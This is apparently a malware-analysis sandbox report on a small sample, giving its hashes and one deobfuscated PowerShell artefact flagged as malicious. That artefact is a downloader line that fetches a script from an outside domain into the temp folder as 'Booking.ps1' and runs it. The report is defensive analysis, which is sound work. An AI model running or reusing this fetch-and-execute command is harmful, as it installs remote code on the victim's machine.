General
Structural Analysis
Config.0
Yara Rules4
Sync
Community
Infection Chain
Summary by MalvaGPT
Characteristics
|
Hash | Hash Value |
|---|---|
| MD5 | c041a6bf6770bb4fb9264e18650c8b73
|
| Sha1 | 39cf9e3d0d0e1bb77d8db604d18deb8098981f41
|
| Sha256 | 9068bab8b883b72e881c691dc9e78201e0283fca8dc7b3b0b29b71828122bd03
|
| Sha384 | 560861e9fc2cfcde39ee8412375c0908f8dc3d0262780df62754f861b9b16f22dc7d303f61f09f570d5d64075a655604
|
| Sha512 | ae4a7ff35982e3211480418031f2f9801da5323f3d7ee736604b2cffe784cdf7ca4abe49968efd0d33421d0fb6c78520134f8a34906f7cd69ee337941153f215
|
| SSDeep | 3:VSJJFISFX1HNjBjjyL5+H/3Ch+TXkKPjXGKIFXQRwJAFBB9ekFxIHLMi0vF3ACM0:s8SFX1HNjBjPahoDrXdIORwijXooi0vP
|
File Structure
Artefacts
|
Name0 | Value |
|---|---|
| Deobfuscated PowerShell | $dest = Join-Path $env:TEMP "Booking.ps1" Invoke-WebRequest "hoevaofvwuf.com" -OutFile $dest if (Test-Path $dest) { Get-Content $dest -TotalCount 20 & $dest } |
c041a6bf6770bb4fb9264e18650c8b73 (175 B)
File Structure
Characteristics
No malware configuration were found at this point.
Artefacts
|
Name0 | Value | Location |
|---|---|---|
| Deobfuscated PowerShell | $dest = Join-Path $env:TEMP "Booking.ps1" Invoke-WebRequest "hoevaofvwuf.com" -OutFile $dest if (Test-Path $dest) { Get-Content $dest -TotalCount 20 & $dest } Malicious |
c041a6bf6770bb4fb9264e18650c8b73 > [PowerShell Command] |
You must be signed in to post a comment.
You need a premium account to access this feature.
You must be signed in to post a comment.